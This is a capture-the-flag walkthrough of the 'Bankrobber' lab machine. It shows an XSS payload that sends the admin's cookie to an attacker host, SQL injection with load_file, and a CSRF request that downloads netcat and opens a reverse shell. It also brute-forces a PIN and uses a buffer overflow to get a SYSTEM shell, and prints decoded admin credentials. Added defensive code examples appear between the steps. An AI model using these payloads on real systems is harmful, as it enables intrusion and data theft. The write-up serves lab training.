Basic information

Port scan

80,443,445,3306:

$ nmap -sC -sV 10.10.10.154
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 13:21 CST
Nmap scan report for 10.10.10.154
Host is up (0.068s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open ssl/http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-29T06:23:01
|_ start_date: 2020-12-29T06:06:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.34 seconds

80/443

A bitcoin exchange:

Web

Register any account and log in: there is an initial balance and transfers can be made. A test transfer prompts that Admin will review it:

XSS

Since the prompt says an administrator will review it, try XSS in the comment field. It is confirmed to exist, and the admin path can also be found. The cookie is just the base64 of the username and password, so use the XSS to grab the administrator's cookie directly (the XSS bot is very unstable; if no request arrives, log out, log back in and retry):

<script src="http://10.10.14.15:7777/cookie.js"></script>

The administrator's cookie is captured, and decoding it gives the admin password:

username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1

admin : Hopelessromantic

admin

Then log in with the admin account; we are now admin:

The admin page has a few links at the top; check their contents.

notes.txt

The notes reveal that this is XAMPP, still in its default directory, and that comments from localhost are not encoded:

- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

backdoorchecker

The page also has a backdoorchecker function, which says only dir may be used; after entering dir it says requests are only accepted from localhost:

var request = new XMLHttpRequest();
request.open('GET', 'http://10.10.14.15:7777/?cookies='+document.cookie, true);
request.send();

SQL injection

The admin page also has a user search function with a very basic SQL injection:

Determine the column count: 3 columns, and 1 and 2 are echoed directly:

load_file

MySQL has load_file for reading files; combined with the default XAMPP path learned earlier, we can read the source code (at this point user.txt could already be read directly):

1'union+select+1,load_file('c:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3;--+-
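The column-count probe and UNION injection above, as an added example that is not part of the original writeup: a Python model of the user-search query in its vulnerable string-concatenated form beside a parameterized one. It uses an in-memory SQLite database rather than MariaDB, so there is no load_file equivalent and the injected UNION reads a second table instead; the table names, rows and function names are constructed for illustration.

```python
# Added example (not from the original writeup): vulnerable vs. parameterized
# user search, modelled in SQLite. Tables, rows and names are constructed.
import sqlite3

# Constructed payload with three columns, matching the column count probed above.
PAYLOAD = "x' UNION SELECT 1, value, 3 FROM secrets--"


def make_db():
    """In-memory database: a users table plus a table the search must never expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", "admin@example.test"),
        (2, "alice", "alice@example.test"),
    ])
    conn.execute("CREATE TABLE secrets (id INTEGER, value TEXT)")
    conn.execute("INSERT INTO secrets VALUES (1, 'constructed-secret')")
    return conn


def search_vulnerable(conn, term):
    """String concatenation: the search term becomes part of the SQL text,
    so a quote, a UNION and a comment marker rewrite the query."""
    sql = f"SELECT id, username, email FROM users WHERE username LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Bound parameter: the term is passed as data and never parsed as SQL."""
    sql = "SELECT id, username, email FROM users WHERE username LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable   :", search_vulnerable(conn, PAYLOAD))
    print("parameterized:", search_parameterized(conn, PAYLOAD))
```

With the payload, the concatenated query returns the row from the secrets table while the parameterized query simply searches for a username containing the literal payload text and returns nothing.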

From the code logic, we can use the XSS to make the admin's browser send a request from localhost and have it execute arbitrary commands.

backdoorchecker.php

<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
    $good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
    if(isset($_POST['cmd'])){
        // FILTER ESCAPE CHARS
        foreach($bad as $char){
            if(strpos($_POST['cmd'],$char) !== false){
                die("You're not allowed to do that.");
            }
        }
        // CHECK IF THE FIRST 2 CHARS ARE LS
        if(substr($_POST['cmd'], 0,strlen($good)) != $good){
            die("It's only allowed to use the $good command");
        }

        if($_SERVER['REMOTE_ADDR'] == "::1"){
            system($_POST['cmd']);
        } else{
            echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
        }
    }
} else{
    echo "You are not allowed to use this function!";
}
?>
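The two weaknesses in backdoorchecker.php, as an added example that is not part of the original writeup: a Python model of its blacklist-plus-prefix filter next to a hardened allowlist that maps each permitted command to a fixed argv run without a shell, and a per-session anti-CSRF token check for the part the REMOTE_ADDR comparison cannot cover. Function names and the sample commands are constructed.

```python
# Added example (not code from the original writeup): a Python model of the
# filter in backdoorchecker.php beside a hardened allowlist check and an
# anti-CSRF token check. Function names and sample commands are constructed.
import hmac
import secrets
import subprocess

BAD_SUBSTRINGS = ("$(", "&")  # the blacklist the PHP code checks with strpos()
GOOD_PREFIX = "dir"           # the PHP code only compares the first strlen("dir") chars


def original_filter_accepts(cmd: str) -> bool:
    """Reproduce the two checks backdoorchecker.php applies before system()."""
    if any(bad in cmd for bad in BAD_SUBSTRINGS):
        return False
    return cmd[:len(GOOD_PREFIX)] == GOOD_PREFIX


# Hardened form: an exact allowlist mapped to a fixed argv, executed with
# shell=False, so nothing the user typed ever reaches a command interpreter.
ALLOWED_COMMANDS = {
    "dir": ["cmd.exe", "/c", "dir"],
}


def hardened_filter_accepts(cmd: str) -> bool:
    """Accept only a command that exactly matches an allowlist entry."""
    return cmd.strip() in ALLOWED_COMMANDS


def run_allowlisted(cmd: str):
    """Run the fixed argv for an allowlisted command; the user's text is never executed."""
    argv = ALLOWED_COMMANDS.get(cmd.strip())
    if argv is None:
        raise PermissionError("command not in allowlist")
    return subprocess.run(argv, capture_output=True, text=True, timeout=10)


def compare_filters(samples):
    """Return {command: (original_accepts, hardened_accepts)} for each sample."""
    return {c: (original_filter_accepts(c), hardened_filter_accepts(c)) for c in samples}


# The REMOTE_ADDR == "::1" check is not an authorization boundary: the admin's
# own browser sits on localhost, so a POST it is tricked into sending passes it.
# A per-session anti-CSRF token that the attacker cannot read closes that gap.
def issue_csrf_token() -> str:
    return secrets.token_hex(32)


def csrf_token_valid(session_token, submitted) -> bool:
    return submitted is not None and hmac.compare_digest(session_token, submitted)


# Constructed sample inputs: one legitimate command and several probing the filter.
SAMPLES = ["dir", "dir|whoami", "dir & whoami", "dir $(whoami)", "whoami", " dir "]

if __name__ == "__main__":
    for cmd, (orig, hard) in compare_filters(SAMPLES).items():
        print(f"{cmd!r:18} original={orig!s:5} hardened={hard}")
```

The comparison shows that the original filter only rejects its two blacklisted substrings and a wrong prefix, so a pipe after dir is accepted, whereas the allowlist accepts nothing but the exact command and never hands user text to a shell.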

XSS + XSRF = Shell

Then modify the XSS code so the administrator executes the command, giving a reverse shell:

shell.js

var request = new XMLHttpRequest();
var params = 'cmd=dir|powershell -c "iwr -uri 10.10.14.15:7777/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.15 4445';
request.open('POST', 'http://localhost/admin/backdoorchecker.php', true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
request.send(params);

user flag

Then user.txt is obtained directly from the user's desktop:

Privilege escalation information

There is a bankv2.exe in the root of the C: drive; the current user has no permission on it:

Checking ports and processes shows bankv2.exe listening on local port 910; the port can be forwarded out:

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 8000 --reverse

# target
powershell -c "wget 10.10.14.15:7777/chisel.exe -o c.exe"
c.exe client 10.10.14.15:8000 R:910:localhost:910

Then testing a connection to local port 910 prompts for a 4-digit PIN:

netstat -ano | findstr LISTENING

netstat -ano | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3364
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 732
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 3364
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1572
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 3388
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 444
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 892
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 876
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1340
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 576
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 584
TCP 10.10.10.154:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 3364
TCP [::]:135 [::]:0 LISTENING 732
TCP [::]:443 [::]:0 LISTENING 3364
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3306 [::]:0 LISTENING 3388
TCP [::]:49664 [::]:0 LISTENING 444
TCP [::]:49665 [::]:0 LISTENING 892
TCP [::]:49666 [::]:0 LISTENING 876
TCP [::]:49667 [::]:0 LISTENING 1340
TCP [::]:49668 [::]:0 LISTENING 576
TCP [::]:49669 [::]:0 LISTENING 584

tasklist

tasklist

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 4 K
System 4 0 140 K
smss.exe 288 0 1.188 K
csrss.exe 360 0 8.324 K
wininit.exe 444 0 5.296 K
csrss.exe 452 1 4.140 K
winlogon.exe 520 1 13.744 K
services.exe 576 0 7.696 K
lsass.exe 584 0 13.052 K
svchost.exe 668 0 14.652 K
svchost.exe 732 0 9.084 K
dwm.exe 824 1 30.176 K
svchost.exe 876 0 50.968 K
svchost.exe 892 0 16.632 K
svchost.exe 904 0 24.436 K
svchost.exe 936 0 16.752 K
svchost.exe 392 0 16.804 K
svchost.exe 1052 0 16.520 K
svchost.exe 1100 0 7.928 K
svchost.exe 1196 0 7.124 K
spoolsv.exe 1340 0 15.596 K
bankv2.exe 1572 0 80 K
svchost.exe 1624 0 20.816 K
svchost.exe 1652 0 10.156 K
vmtoolsd.exe 1780 0 23.688 K
VGAuthService.exe 1788 0 13.024 K
Memory Compression 1904 0 34.376 K
xampp-control.exe 2224 0 2.912 K
WmiPrvSE.exe 2364 0 19.144 K
dllhost.exe 2436 0 13.020 K
msdtc.exe 2612 0 10.180 K
LogonUI.exe 2780 1 49.004 K
SearchIndexer.exe 2864 0 18.632 K
conhost.exe 2276 0 560 K
httpd.exe 3364 0 36 K
conhost.exe 3372 0 48 K
mysqld.exe 3388 0 14.748 K
conhost.exe 3400 0 112 K
httpd.exe 3724 0 6.868 K
svchost.exe 3544 0 7.076 K
sedsvc.exe 2788 0 8.488 K
svchost.exe 3688 0 8.296 K
cmd.exe 1692 0 2.772 K
conhost.exe 1504 0 4.188 K
powershell.exe 3012 0 6.784 K
n.exe 2420 0 3.936 K
cmd.exe 4236 0 3.116 K
SearchProtocolHost.exe 1524 0 10.764 K
SearchFilterHost.exe 1292 0 6.336 K
tasklist.exe 4424 0 7.784 K
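The port-to-process correlation done by eye above, as an added example that is not part of the original writeup: a small parser that joins the LISTENING lines of netstat -ano to the tasklist rows by PID, so every listening port is labelled with the image that owns it. The sample text is trimmed from the output shown above (PID 732 is deliberately left out of the tasklist sample to exercise the unknown-PID path); the function names are constructed.

```python
# Added example (not code from the original writeup): join `netstat -ano`
# LISTENING lines to `tasklist` rows by PID. Sample text is trimmed from the
# output above; PID 732 is omitted from the tasklist sample on purpose.
import re

NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
# Image names may contain spaces ("System Idle Process"), so match lazily up to the PID.
TASKLIST_RE = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\b")

NETSTAT_SAMPLE = """\
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3364
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 732
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1572
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 3388
TCP [::]:80 [::]:0 LISTENING 3364
TCP [::]:3306 [::]:0 LISTENING 3388
"""

TASKLIST_SAMPLE = """\
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 4 K
System 4 0 140 K
bankv2.exe 1572 0 80 K
httpd.exe 3364 0 36 K
mysqld.exe 3388 0 14.748 K
"""


def parse_tasklist(text):
    """Map PID -> image name; header and separator lines contain no PID and are skipped."""
    pids = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            pids[int(m.group("pid"))] = m.group("image").strip()
    return pids


def parse_listeners(text):
    """Yield (proto, address, port, pid) for every LISTENING line."""
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, addr, port, pid = m.groups()
            yield proto, addr, int(port), int(pid)


def map_listeners(netstat_text, tasklist_text):
    """Return {port: owner}, owner being the image name or 'unknown (pid N)'."""
    pids = parse_tasklist(tasklist_text)
    owners = {}
    for _proto, _addr, port, pid in parse_listeners(netstat_text):
        owners[port] = pids.get(pid, f"unknown (pid {pid})")
    return owners


if __name__ == "__main__":
    for port, owner in sorted(map_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE).items()):
        print(f"{port:>5}  {owner}")
```

On a real host this is the quick inventory check a defender runs: a listener such as 910 owned by a binary that is not part of the web stack stands out immediately.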

bankv2

First, a script brute-forces the PIN, which turns out to be 0021:

Test the function with the correct PIN:

overflow

Entering a long string shows that it overwrites the program called internally: a basic overflow:

So it is the usual routine of confirming the offset and building the payload:

➜  ~ msf-pattern_create -l 40
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A
➜ ~ msf-pattern_offset -q 0Ab1
[*] Exact match at offset 32
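How the two tools above arrive at offset 32, as an added example that is not part of the original writeup: a Python reimplementation of the cyclic pattern used by msf-pattern_create (uppercase, lowercase, digit triplets) and of the substring lookup msf-pattern_offset performs. The function names are constructed.

```python
# Added example (not code from the original writeup): the cyclic pattern
# behind msf-pattern_create and the lookup behind msf-pattern_offset.
import string


def pattern_create(length):
    """Build the pattern Aa0Aa1...Aa9Ab0... and truncate it to `length` characters."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]      # full pattern is 26*26*10*3 = 20280 chars


def pattern_offset(needle, length=20280):
    """Return the offset of `needle` in the pattern, or -1 if it does not occur."""
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(40))          # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A
    print(pattern_offset("0Ab1", 40))  # 32
```

Every 4-character window of the pattern is unique within one cycle, which is why the four bytes found in the overwritten field identify the offset unambiguously.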

exploit

Simply change it to use the nc we uploaded earlier for a reverse shell, which comes back with SYSTEM privileges:

python -c 'print "A"*32 + "\\Users\\Cortin\\AppData\\Local\\Temp\\n.exe -e cmd.exe 10.10.14.15 4446"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\Users\Cortin\AppData\Local\Temp\n.exe -e cmd.exe 10.10.14.15 4446

brute.py

#!/usr/bin/env python3
# Brute-force the 4-digit PIN of the bankv2 service forwarded to localhost:910.

import socket
import sys


for i in range(10000):
    sys.stdout.write(f"\rTrying: {i:04d}")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('localhost', 910))
    s.recv(4096)                       # read the PIN prompt
    s.send(f"{i:04d}\n".encode())
    resp = s.recv(4096)
    if b"Access denied" not in resp:   # any reply other than a denial means the PIN is right
        print(f"\rFound pin: {i:04d}")
        s.close()
        break
    s.close()

root flag

After that, root.txt is obtained directly from the admin's desktop:

References